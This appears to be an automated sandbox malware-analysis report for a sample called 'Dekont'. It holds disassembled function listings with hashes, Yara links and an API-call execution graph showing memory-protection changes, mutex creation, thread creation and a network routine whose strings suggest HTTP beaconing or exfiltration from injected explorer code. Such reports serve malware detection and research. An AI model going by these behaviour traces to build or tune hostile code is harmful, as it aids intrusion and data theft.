                                  Function 010820E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$[$]:%u
                                  • API String ID: 48624451-2819853543
                                  • Opcode ID: d4371fd65ebd13473dc1cdda1e1284c5b1015624f4508f876499345285a9b692
                                  • Instruction ID: 99fd33258557116b4976974613b0740e251cdef7b3f6b2b94a29128cd9eba149
                                  • Opcode Fuzzy Hash: d4371fd65ebd13473dc1cdda1e1284c5b1015624f4508f876499345285a9b692
                                  • Instruction Fuzzy Hash: 2E21957AA00119ABDB10EF79CC50AFE7BF8EF64640F540156E985E3204E734DA11CBA1
                                  Function 00FFF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                  Download Yara Rule
                                  Strings
                                  • RTL: Re-Waiting, xrefs: 0104031E
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010402E7
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010402BD
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                  • API String ID: 0-2474120054
                                  • Opcode ID: 226eab3cb18efefe0a6653cdcc83e6049817e7b2f521ed16220caa922dd59015
                                  • Instruction ID: c5a514da8b8b8c0331622890672725566e7086ea8df7ba82d1c629149c9abce6
                                  • Opcode Fuzzy Hash: 226eab3cb18efefe0a6653cdcc83e6049817e7b2f521ed16220caa922dd59015
                                  • Instruction Fuzzy Hash: 0BE10F716047459FD721CF28C880B6ABBE0BF88724F244A6DF6A5DB2E1D774D848DB42
                                  Function 0100BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                  Download Yara Rule
                                  Strings
                                  • RTL: Re-Waiting, xrefs: 01047BAC
                                  • RTL: Resource at %p, xrefs: 01047B8E
                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01047B7F
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 0-871070163
                                  • Opcode ID: 49e391ae14dbc5cbd3e8878d5b85cd3cd3478bee4e51684135d10239847f50af
                                  • Instruction ID: ff860ec136631bf57525f7accfd6eb966cb3a198666011c27567bcad3408dac0
                                  • Opcode Fuzzy Hash: 49e391ae14dbc5cbd3e8878d5b85cd3cd3478bee4e51684135d10239847f50af
                                  • Instruction Fuzzy Hash: 8A41E2753007029FE722DE29C840B6AB7E5EF98710F100A6DF9DA97280DB71E8058B92
                                  Function 0100B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                  Download Yara Rule
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0104728C
                                  Strings
                                  • RTL: Re-Waiting, xrefs: 010472C1
                                  • RTL: Resource at %p, xrefs: 010472A3
                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01047294
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-605551621
                                  • Opcode ID: 025b6794345670c0c14d07ad579c54952a4895e03a83ff687e6057bf8c713d9a
                                  • Instruction ID: 0f35da64c19c75264d37daec2a59f47dc2310f711ec9ac8a2bb63386c38c1ec9
                                  • Opcode Fuzzy Hash: 025b6794345670c0c14d07ad579c54952a4895e03a83ff687e6057bf8c713d9a
                                  • Instruction Fuzzy Hash: 3241DFB5700207ABD721DE29CD81BAAB7E5FB94710F100669F9D5AB280DB61E842CBD1
                                  Function 01082300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  • Opcode ID: 5698f82fc7a6631d9e083138f34589d72f1e7434ac9279dcf1138d0e3a8af6d8
                                  • Instruction ID: 392b12332d4934e00bae99b5f4b2facbb5ad2014ceae994ffd17de1014739d9b
                                  • Opcode Fuzzy Hash: 5698f82fc7a6631d9e083138f34589d72f1e7434ac9279dcf1138d0e3a8af6d8
                                  • Instruction Fuzzy Hash: 31318776A002299FDB60DE2CCD50BEEB7F8EF54650F854595E9C9E3140EB309A44CB60
                                  Function 01017D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-
                                  • API String ID: 1302938615-2137968064
                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction ID: d87e9b553b8fae7e2cb8fe09ae0871bb51bd8a9518c335e52a26c3695a97b3f6
                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction Fuzzy Hash: 3491A271E0020A9BEF64DF6DC880ABFBBF5AF44320F54855AE9D5E72C8D73899408751
                                  Function 00FD9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $$@
                                  • API String ID: 0-1194432280
                                  • Opcode ID: 9c695f3933fa18280361752731f9fceff769b4b29b6ed9ff826c54f6def0ca59
                                  • Instruction ID: 428c26af882222f512695aeb5aecb06587b8734708f943944058e200d8771f89
                                  • Opcode Fuzzy Hash: 9c695f3933fa18280361752731f9fceff769b4b29b6ed9ff826c54f6def0ca59
                                  • Instruction Fuzzy Hash: 86812A71D002699BDB31CB94CC45BEEB7B8AF48710F0441EAAA49B7280D7759E84DFA0

                                  Execution Graph

                                  Execution Coverage:2.3%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:4.7%
                                  Total number of Nodes:444
                                  Total number of Limit Nodes:15
                                  execution_graph 13803 e7492f4 13804 e749349 13803->13804 13805 e74949f 13804->13805 13807 e7458f2 NtProtectVirtualMemory 13804->13807 13806 e7458f2 NtProtectVirtualMemory 13805->13806 13810 e7494c3 13805->13810 13806->13810 13808 e749480 13807->13808 13809 e7458f2 NtProtectVirtualMemory 13808->13809 13809->13805 13811 e749597 13810->13811 13812 e7458f2 NtProtectVirtualMemory 13810->13812 13813 e7458f2 NtProtectVirtualMemory 13811->13813 13816 e7495bf 13811->13816 13812->13811 13813->13816 13814 e7496e1 13815 e74c382 ObtainUserAgentString 13814->13815 13818 e7496e9 13815->13818 13817 e7496b9 13816->13817 13819 e7458f2 NtProtectVirtualMemory 13816->13819 13817->13814 13820 e7458f2 NtProtectVirtualMemory 13817->13820 13819->13817 13820->13814 13934 e7529f1 13935 e7529f7 13934->13935 13938 e747852 13935->13938 13937 e752a0f 13939 e7478e4 13938->13939 13940 e747865 13938->13940 13939->13937 13940->13939 13942 e747887 13940->13942 13944 e74787e 13940->13944 13941 e74d36f 13941->13937 13942->13939 13943 e74b662 6 API calls 13942->13943 13943->13939 13944->13941 13945 e74d0c2 6 API calls 13944->13945 13945->13941 13821 e7450f1 13822 e745109 13821->13822 13826 e7451d3 13821->13826 13823 e745012 6 API calls 13822->13823 13824 e745113 13823->13824 13825 e750f82 6 API calls 13824->13825 13824->13826 13825->13826 13946 e7465f1 13947 e746606 13946->13947 13948 e74660e 13946->13948 13949 e74b662 6 API calls 13947->13949 13949->13948 13954 e7529b3 13955 e7529bd 13954->13955 13958 e7476d2 13955->13958 13957 e7529e0 13959 e747704 13958->13959 13960 e7476f7 13958->13960 13962 e74772d 13959->13962 13964 e747737 13959->13964 13966 e7476ff 13959->13966 13961 e7450f2 6 API calls 13960->13961 13961->13966 13967 e74d2c2 13962->13967 13965 e750f82 6 API calls 13964->13965 13964->13966 13965->13966 13966->13957 13968 e74d2df 13967->13968 13969 e74d2cb 13967->13969 13968->13966 13969->13968 13970 e74d0c2 6 API calls 13969->13970 13970->13968 13489 e750232 13490 e75025c 13489->13490 13492 e750334 13489->13492 13491 e750410 NtCreateFile 13490->13491 13490->13492 13491->13492 13879 e74b8be 13880 e74b8c3 13879->13880 13881 e74b9a6 13880->13881 13882 e74b995 ObtainUserAgentString 13880->13882 13882->13881 13971 e748fbf 13972 e749016 13971->13972 13975 e7490bb 13972->13975 13976 e7490f0 13972->13976 13977 e7458f2 NtProtectVirtualMemory 13972->13977 13973 e7490e8 13974 e74c382 ObtainUserAgentString 13973->13974 13974->13976 13975->13973 13978 e7458f2 NtProtectVirtualMemory 13975->13978 13977->13975 13978->13973 13883 e74d0b9 13884 e74d0ed 13883->13884 13886 e74d1f0 13883->13886 13885 e750f82 6 API calls 13884->13885 13884->13886 13885->13886 13767 e74f83a 13768 e74f841 13767->13768 13769 e750f82 6 API calls 13768->13769 13771 e74f8c5 13769->13771 13770 e74f906 13771->13770 13772 e750232 NtCreateFile 13771->13772 13772->13770 13827 e7490fb 13829 e749137 13827->13829 13828 e7492d5 13829->13828 13830 e7458f2 NtProtectVirtualMemory 13829->13830 13831 e74928a 13830->13831 13832 e7458f2 NtProtectVirtualMemory 13831->13832 13835 e7492a9 13832->13835 13833 e7492cd 13834 e74c382 ObtainUserAgentString 13833->13834 13834->13828 13835->13833 13836 e7458f2 NtProtectVirtualMemory 13835->13836 13836->13833 13899 e750f7a 13901 e750fb8 13899->13901 13900 e751022 13901->13900 13902 e74d5b2 socket 13901->13902 13904 e751081 13901->13904 13902->13904 13903 e751134 13903->13900 13905 e74d732 connect 13903->13905 13910 e7511b2 13903->13910 13904->13900 13904->13903 13906 e751117 getaddrinfo 13904->13906 13905->13910 13906->13903 13907 e74d6b2 send 13909 e751729 13907->13909 13908 e7517f4 setsockopt recv 13908->13900 13909->13900 13909->13908 13910->13900 13910->13907 13837 e74d2e4 13838 e74d36f 13837->13838 13839 e74d305 13837->13839 13839->13838 13841 e74d0c2 13839->13841 13842 e74d0cb 13841->13842 13844 e74d1f0 13841->13844 13843 e750f82 6 API calls 13842->13843 13842->13844 13843->13844 13844->13838 13911 e747b66 13913 e747b6a 13911->13913 13912 e747cce 13913->13912 13914 e747cb5 CreateMutexExW 13913->13914 13914->13912 13845 e74ace2 13847 e74add9 13845->13847 13846 e74b022 13847->13846 13851 e74a352 13847->13851 13849 e74af0d 13849->13846 13860 e74a792 13849->13860 13853 e74a39e 13851->13853 13852 e74a58e 13852->13849 13853->13852 13854 e74a4ec 13853->13854 13856 e74a595 13853->13856 13855 e750232 NtCreateFile 13854->13855 13858 e74a4ff 13855->13858 13856->13852 13857 e750232 NtCreateFile 13856->13857 13857->13852 13858->13852 13859 e750232 NtCreateFile 13858->13859 13859->13852 13861 e74a7e0 13860->13861 13862 e750232 NtCreateFile 13861->13862 13864 e74a90c 13862->13864 13863 e74aaf3 13863->13849 13864->13863 13865 e74a352 NtCreateFile 13864->13865 13866 e74a602 NtCreateFile 13864->13866 13865->13864 13866->13864 13602 e751bac 13603 e751bb1 13602->13603 13636 e751bb6 13603->13636 13637 e747b72 13603->13637 13605 e751c2c 13606 e751c85 13605->13606 13608 e751c54 13605->13608 13609 e751c69 13605->13609 13605->13636 13607 e74fab2 NtProtectVirtualMemory 13606->13607 13610 e751c8d 13607->13610 13611 e74fab2 NtProtectVirtualMemory 13608->13611 13612 e751c80 13609->13612 13613 e751c6e 13609->13613 13673 e749102 13610->13673 13617 e751c5c 13611->13617 13612->13606 13615 e751c97 13612->13615 13614 e74fab2 NtProtectVirtualMemory 13613->13614 13618 e751c76 13614->13618 13619 e751c9c 13615->13619 13620 e751cbe 13615->13620 13659 e748ee2 13617->13659 13665 e748fc2 13618->13665 13641 e74fab2 13619->13641 13623 e751cc7 13620->13623 13624 e751cd9 13620->13624 13620->13636 13625 e74fab2 NtProtectVirtualMemory 13623->13625 13628 e74fab2 NtProtectVirtualMemory 13624->13628 13624->13636 13627 e751ccf 13625->13627 13683 e7492f2 13627->13683 13632 e751ce5 13628->13632 13701 e749712 13632->13701 13639 e747b93 13637->13639 13638 e747cce 13638->13605 13639->13638 13640 e747cb5 CreateMutexExW 13639->13640 13640->13638 13643 e74fadf 13641->13643 13642 e74febc 13651 e748de2 13642->13651 13643->13642 13713 e7458f2 13643->13713 13645 e74fe5c 13646 e7458f2 NtProtectVirtualMemory 13645->13646 13647 e74fe7c 13646->13647 13648 e7458f2 NtProtectVirtualMemory 13647->13648 13649 e74fe9c 13648->13649 13650 e7458f2 NtProtectVirtualMemory 13649->13650 13650->13642 13653 e748df0 13651->13653 13652 e748ecd 13655 e745412 13652->13655 13653->13652 13736 e74c382 13653->13736 13657 e745440 13655->13657 13656 e745473 13656->13636 13657->13656 13658 e74544d CreateThread 13657->13658 13658->13636 13661 e748f06 13659->13661 13660 e748fa4 13660->13636 13661->13660 13662 e7458f2 NtProtectVirtualMemory 13661->13662 13663 e748f9c 13662->13663 13664 e74c382 ObtainUserAgentString 13663->13664 13664->13660 13666 e749016 13665->13666 13667 e7490bb 13666->13667 13670 e7490f0 13666->13670 13671 e7458f2 NtProtectVirtualMemory 13666->13671 13668 e7490e8 13667->13668 13672 e7458f2 NtProtectVirtualMemory 13667->13672 13669 e74c382 ObtainUserAgentString 13668->13669 13669->13670 13670->13636 13671->13667 13672->13668 13674 e749137 13673->13674 13675 e7492d5 13674->13675 13676 e7458f2 NtProtectVirtualMemory 13674->13676 13675->13636 13677 e74928a 13676->13677 13678 e7458f2 NtProtectVirtualMemory 13677->13678 13681 e7492a9 13678->13681 13679 e7492cd 13680 e74c382 ObtainUserAgentString 13679->13680 13680->13675 13681->13679 13682 e7458f2 NtProtectVirtualMemory 13681->13682 13682->13679 13685 e749349 13683->13685 13684 e74949f 13686 e7458f2 NtProtectVirtualMemory 13684->13686 13690 e7494c3 13684->13690 13685->13684 13687 e7458f2 NtProtectVirtualMemory 13685->13687 13686->13690 13688 e749480 13687->13688 13689 e7458f2 NtProtectVirtualMemory 13688->13689 13689->13684 13691 e749597 13690->13691 13692 e7458f2 NtProtectVirtualMemory 13690->13692 13693 e7458f2 NtProtectVirtualMemory 13691->13693 13696 e7495bf 13691->13696 13692->13691 13693->13696 13694 e7496e1 13695 e74c382 ObtainUserAgentString 13694->13695 13698 e7496e9 13695->13698 13697 e7496b9 13696->13697 13699 e7458f2 NtProtectVirtualMemory 13696->13699 13697->13694 13700 e7458f2 NtProtectVirtualMemory 13697->13700 13698->13636 13699->13697 13700->13694 13702 e749767 13701->13702 13703 e7458f2 NtProtectVirtualMemory 13702->13703 13708 e749903 13702->13708 13704 e7498e3 13703->13704 13705 e7458f2 NtProtectVirtualMemory 13704->13705 13705->13708 13706 e7499b7 13707 e74c382 ObtainUserAgentString 13706->13707 13709 e7499bf 13707->13709 13710 e7458f2 NtProtectVirtualMemory 13708->13710 13711 e749992 13708->13711 13709->13636 13710->13711 13711->13706 13712 e7458f2 NtProtectVirtualMemory 13711->13712 13712->13706 13714 e745987 13713->13714 13717 e7459b2 13714->13717 13728 e746622 13714->13728 13716 e745c0c 13716->13645 13717->13716 13718 e745ba2 13717->13718 13720 e745ac5 13717->13720 13719 e751e12 NtProtectVirtualMemory 13718->13719 13727 e745b5b 13719->13727 13732 e751e12 13720->13732 13722 e751e12 NtProtectVirtualMemory 13722->13716 13723 e745ae3 13723->13716 13724 e745b3d 13723->13724 13725 e751e12 NtProtectVirtualMemory 13723->13725 13726 e751e12 NtProtectVirtualMemory 13724->13726 13725->13724 13726->13727 13727->13716 13727->13722 13729 e74667a 13728->13729 13730 e751e12 NtProtectVirtualMemory 13729->13730 13731 e74667e 13729->13731 13730->13729 13731->13717 13733 e750942 13732->13733 13734 e751e45 NtProtectVirtualMemory 13733->13734 13735 e751e70 13734->13735 13735->13723 13737 e74c3c7 13736->13737 13740 e74c232 13737->13740 13739 e74c438 13739->13652 13741 e74c25e 13740->13741 13744 e74b8c2 13741->13744 13743 e74c26b 13743->13739 13745 e74b934 13744->13745 13746 e74b9a6 13745->13746 13747 e74b995 ObtainUserAgentString 13745->13747 13746->13743 13747->13746 13773 e74642e 13774 e74645b 13773->13774 13782 e7464c9 13773->13782 13775 e750232 NtCreateFile 13774->13775 13774->13782 13777 e746496 13775->13777 13776 e7464c5 13779 e750232 NtCreateFile 13776->13779 13776->13782 13777->13776 13778 e746082 NtCreateFile 13777->13778 13780 e7464b6 13778->13780 13779->13782 13780->13776 13781 e745f52 NtCreateFile 13780->13781 13781->13776 13931 e74d72e 13932 e74d788 connect 13931->13932 13933 e74d76a 13931->13933 13933->13932 13887 e752aa9 13888 e752aaf 13887->13888 13891 e74d212 13888->13891 13890 e752ac7 13892 e74d237 13891->13892 13893 e74d21b 13891->13893 13892->13890 13893->13892 13894 e74d0c2 6 API calls 13893->13894 13894->13892 13783 e74c22a 13784 e74c25e 13783->13784 13785 e74b8c2 ObtainUserAgentString 13784->13785 13786 e74c26b 13785->13786 13867 e74acd4 13869 e74acd8 13867->13869 13868 e74b022 13869->13868 13870 e74a352 NtCreateFile 13869->13870 13871 e74af0d 13870->13871 13871->13868 13872 e74a792 NtCreateFile 13871->13872 13872->13871 13493 e751e12 13497 e750942 13493->13497 13495 e751e45 NtProtectVirtualMemory 13496 e751e70 13495->13496 13498 e750967 13497->13498 13498->13495 13787 e746613 13789 e746620 13787->13789 13788 e74667e 13789->13788 13790 e751e12 NtProtectVirtualMemory 13789->13790 13790->13789 13520 e7452dd 13523 e74531a 13520->13523 13521 e7453fa 13522 e745328 SleepEx 13522->13522 13522->13523 13523->13521 13523->13522 13527 e74ff12 13523->13527 13536 e746432 13523->13536 13546 e7450f2 13523->13546 13528 e74ff48 13527->13528 13531 e7500e9 13528->13531 13534 e750134 13528->13534 13535 e750232 NtCreateFile 13528->13535 13552 e750f82 13528->13552 13529 e750125 13572 e74f922 13529->13572 13531->13529 13564 e74f842 13531->13564 13534->13523 13535->13528 13537 e74645b 13536->13537 13545 e7464c9 13536->13545 13538 e750232 NtCreateFile 13537->13538 13537->13545 13539 e746496 13538->13539 13544 e7464c5 13539->13544 13584 e746082 13539->13584 13541 e750232 NtCreateFile 13541->13545 13542 e7464b6 13542->13544 13593 e745f52 13542->13593 13544->13541 13544->13545 13545->13523 13547 e7451d3 13546->13547 13548 e745109 13546->13548 13547->13523 13598 e745012 13548->13598 13550 e745113 13550->13547 13551 e750f82 6 API calls 13550->13551 13551->13547 13553 e750fb8 13552->13553 13554 e74d5b2 socket 13553->13554 13556 e751081 13553->13556 13563 e751022 13553->13563 13554->13556 13555 e751134 13557 e74d732 connect 13555->13557 13562 e7511b2 13555->13562 13555->13563 13556->13555 13558 e751117 getaddrinfo 13556->13558 13556->13563 13557->13562 13558->13555 13559 e74d6b2 send 13561 e751729 13559->13561 13560 e7517f4 setsockopt recv 13560->13563 13561->13560 13561->13563 13562->13559 13562->13563 13563->13528 13565 e74f86d 13564->13565 13580 e750232 13565->13580 13567 e74f906 13567->13531 13568 e74f888 13568->13567 13569 e74f8c5 13568->13569 13570 e750f82 6 API calls 13568->13570 13569->13567 13571 e750232 NtCreateFile 13569->13571 13570->13569 13571->13567 13573 e74f9c2 13572->13573 13574 e750232 NtCreateFile 13573->13574 13577 e74f9d6 13574->13577 13575 e74fa9f 13575->13534 13576 e74fa5d 13576->13575 13578 e750232 NtCreateFile 13576->13578 13577->13575 13577->13576 13579 e750f82 6 API calls 13577->13579 13578->13575 13579->13576 13581 e75025c 13580->13581 13583 e750334 13580->13583 13582 e750410 NtCreateFile 13581->13582 13581->13583 13582->13583 13583->13568 13585 e746420 13584->13585 13586 e7460aa 13584->13586 13585->13542 13586->13585 13587 e750232 NtCreateFile 13586->13587 13589 e7461f9 13587->13589 13588 e7463df 13588->13542 13589->13588 13590 e750232 NtCreateFile 13589->13590 13591 e7463c9 13590->13591 13592 e750232 NtCreateFile 13591->13592 13592->13588 13594 e745f84 13593->13594 13595 e745f70 13593->13595 13596 e750232 NtCreateFile 13594->13596 13595->13544 13597 e746046 13596->13597 13597->13544 13599 e745031 13598->13599 13600 e7450cd 13599->13600 13601 e750f82 6 API calls 13599->13601 13600->13550 13601->13600 13873 e748edd 13875 e748f06 13873->13875 13874 e748fa4 13875->13874 13876 e7458f2 NtProtectVirtualMemory 13875->13876 13877 e748f9c 13876->13877 13878 e74c382 ObtainUserAgentString 13877->13878 13878->13874 13791 e752a1f 13792 e752a25 13791->13792 13795 e7465f2 13792->13795 13794 e752a3d 13796 e74660e 13795->13796 13797 e7465fb 13795->13797 13796->13794 13797->13796 13798 e74b662 6 API calls 13797->13798 13798->13796 13950 e748dd9 13952 e748df0 13950->13952 13951 e748ecd 13952->13951 13953 e74c382 ObtainUserAgentString 13952->13953 13953->13951 13499 e750f82 13500 e750fb8 13499->13500 13503 e751081 13500->13503 13510 e751022 13500->13510 13511 e74d5b2 13500->13511 13502 e751134 13509 e7511b2 13502->13509 13502->13510 13514 e74d732 13502->13514 13503->13502 13505 e751117 getaddrinfo 13503->13505 13503->13510 13505->13502 13507 e7517f4 setsockopt recv 13507->13510 13508 e751729 13508->13507 13508->13510 13509->13510 13517 e74d6b2 13509->13517 13512 e74d5ec 13511->13512 13513 e74d60a socket 13511->13513 13512->13513 13513->13503 13515 e74d788 connect 13514->13515 13516 e74d76a 13514->13516 13515->13509 13516->13515 13518 e74d705 send 13517->13518 13519 e74d6e7 13517->13519 13518->13508 13519->13518 13748 e752a4d 13749 e752a53 13748->13749 13752 e746782 13749->13752 13751 e752a6b 13753 e74678f 13752->13753 13754 e7467ad 13753->13754 13756 e74b662 13753->13756 13754->13751 13757 e74b66b 13756->13757 13762 e74b7ba 13756->13762 13758 e7450f2 6 API calls 13757->13758 13757->13762 13760 e74b6ee 13758->13760 13759 e74b750 13759->13762 13763 e74b83f 13759->13763 13765 e74b791 13759->13765 13760->13759 13761 e750f82 6 API calls 13760->13761 13761->13759 13762->13754 13763->13762 13764 e750f82 6 API calls 13763->13764 13764->13762 13765->13762 13766 e750f82 6 API calls 13765->13766 13766->13762 13915 e74a14a 13916 e74a153 13915->13916 13921 e74a174 13915->13921 13917 e74c382 ObtainUserAgentString 13916->13917 13919 e74a16c 13917->13919 13918 e74a1e7 13920 e7450f2 6 API calls 13919->13920 13920->13921 13921->13918 13923 e7451f2 13921->13923 13924 e74520f 13923->13924 13928 e7452c9 13923->13928 13925 e74ff12 7 API calls 13924->13925 13926 e745242 13924->13926 13925->13926 13927 e745289 13926->13927 13929 e746432 NtCreateFile 13926->13929 13927->13928 13930 e7450f2 6 API calls 13927->13930 13928->13921 13929->13927 13930->13928 13799 e751e0a 13800 e751e45 NtProtectVirtualMemory 13799->13800 13801 e750942 13799->13801 13802 e751e70 13800->13802 13801->13800

                                  Executed Functions

                                  Function 0E750F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 e750f82-e750fb6 1 e750fd6-e750fd9 0->1 2 e750fb8-e750fbc 0->2 4 e750fdf-e750fed 1->4 5 e7518fe-e75190c 1->5 2->1 3 e750fbe-e750fc2 2->3 3->1 6 e750fc4-e750fc8 3->6 7 e7518f6-e7518f7 4->7 8 e750ff3-e750ff7 4->8 6->1 9 e750fca-e750fce 6->9 7->5 10 e750fff-e751000 8->10 11 e750ff9-e750ffd 8->11 9->1 12 e750fd0-e750fd4 9->12 13 e75100a-e751010 10->13 11->10 11->13 12->1 12->4 14 e751012-e751020 13->14 15 e75103a-e751060 13->15 14->15 16 e751022-e751026 14->16 17 e751062-e751066 15->17 18 e751068-e75107c call e74d5b2 15->18 16->7 20 e75102c-e751035 16->20 17->18 21 e7510a8-e7510ab 17->21 22 e751081-e7510a2 18->22 20->7 23 e751144-e751150 21->23 24 e7510b1-e7510b8 21->24 22->21 25 e7518ee-e7518ef 22->25 23->25 28 e751156-e751165 23->28 26 e7510e2-e7510f5 24->26 27 e7510ba-e7510dc call e750942 24->27 25->7 26->25 30 e7510fb-e751101 26->30 27->26 31 e751167-e751178 call e74d552 28->31 32 e75117f-e75118f 28->32 30->25 37 e751107-e751109 30->37 31->32 34 e7511e5-e75121b 32->34 35 e751191-e7511ad call e74d732 32->35 40 e75122d-e751231 34->40 41 e75121d-e75122b 34->41 43 e7511b2-e7511da 35->43 37->25 42 e75110f-e751111 37->42 45 e751247-e75124b 40->45 46 e751233-e751245 40->46 44 e75127f-e751280 41->44 42->25 47 e751117-e751132 getaddrinfo 42->47 43->34 49 e7511dc-e7511e1 43->49 48 e751283-e7512e0 call e751d62 call e74e482 call e74de72 call e752002 44->48 50 e751261-e751265 45->50 51 e75124d-e75125f 45->51 46->44 47->23 52 e751134-e75113c 47->52 63 e7512f4-e751354 call e751d92 48->63 64 e7512e2-e7512e6 48->64 49->34 54 e751267-e75126b 50->54 55 e75126d-e751279 50->55 51->44 52->23 54->48 54->55 55->44 69 e75148c-e7514b8 call e751d62 call e752262 63->69 70 e75135a-e751396 call e751d62 call e752262 call e752002 63->70 64->63 65 e7512e8-e7512ef call e74e042 64->65 65->63 79 e7514d9-e751590 call e752262 * 3 call e752002 * 2 call e74e482 69->79 80 e7514ba-e7514d5 69->80 85 e751398-e7513b7 call e752262 call e752002 70->85 86 e7513bb-e7513e9 call e752262 * 2 70->86 110 e751595-e7515b9 call e752262 79->110 80->79 85->86 100 e751415-e75141d 86->100 101 e7513eb-e751410 call e752002 call e752262 86->101 104 e751442-e751448 100->104 105 e75141f-e751425 100->105 101->100 104->110 111 e75144e-e751456 104->111 108 e751467-e751487 call e752262 105->108 109 e751427-e75143d 105->109 108->110 109->110 121 e7515d1-e7516ad call e752262 * 7 call e752002 call e751d62 call e752002 call e74de72 call e74e042 110->121 122 e7515bb-e7515cc call e752262 call e752002 110->122 111->110 116 e75145c-e75145d 111->116 116->108 133 e7516af-e7516b3 121->133 122->133 135 e7516b5-e7516fa call e74d382 call e74d7b2 133->135 136 e7516ff-e75172d call e74d6b2 133->136 158 e7518e6-e7518e7 135->158 145 e75175d-e751761 136->145 146 e75172f-e751735 136->146 147 e751767-e75176b 145->147 148 e75190d-e751913 145->148 146->145 151 e751737-e75174c 146->151 155 e751771-e751773 147->155 156 e7518aa-e7518df call e74d7b2 147->156 153 e751779-e751784 148->153 154 e751919-e751920 148->154 151->145 152 e75174e-e751754 151->152 152->145 159 e751756 152->159 160 e751786-e751793 153->160 161 e751795-e751796 153->161 154->160 155->153 155->156 156->158 158->25 159->145 160->161 164 e75179c-e7517a0 160->164 161->164 167 e7517b1-e7517b2 164->167 168 e7517a2-e7517af 164->168 170 e7517b8-e7517c4 167->170 168->167 168->170 173 e7517f4-e751861 setsockopt recv 170->173 174 e7517c6-e7517ef call e751d92 call e751d62 170->174 175 e7518a3-e7518a4 173->175 176 e751863 173->176 174->173 175->156 176->175 179 e751865-e75186a 176->179 179->175 183 e75186c-e751872 179->183 183->175 186 e751874-e7518a1 183->186 186->175 186->176
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538701995.000000000E6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e6c0000_explorer.jbxd
                                  Similarity
                                  • API ID: getaddrinforecvsetsockopt
                                  • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                  • API String ID: 1564272048-1117930895
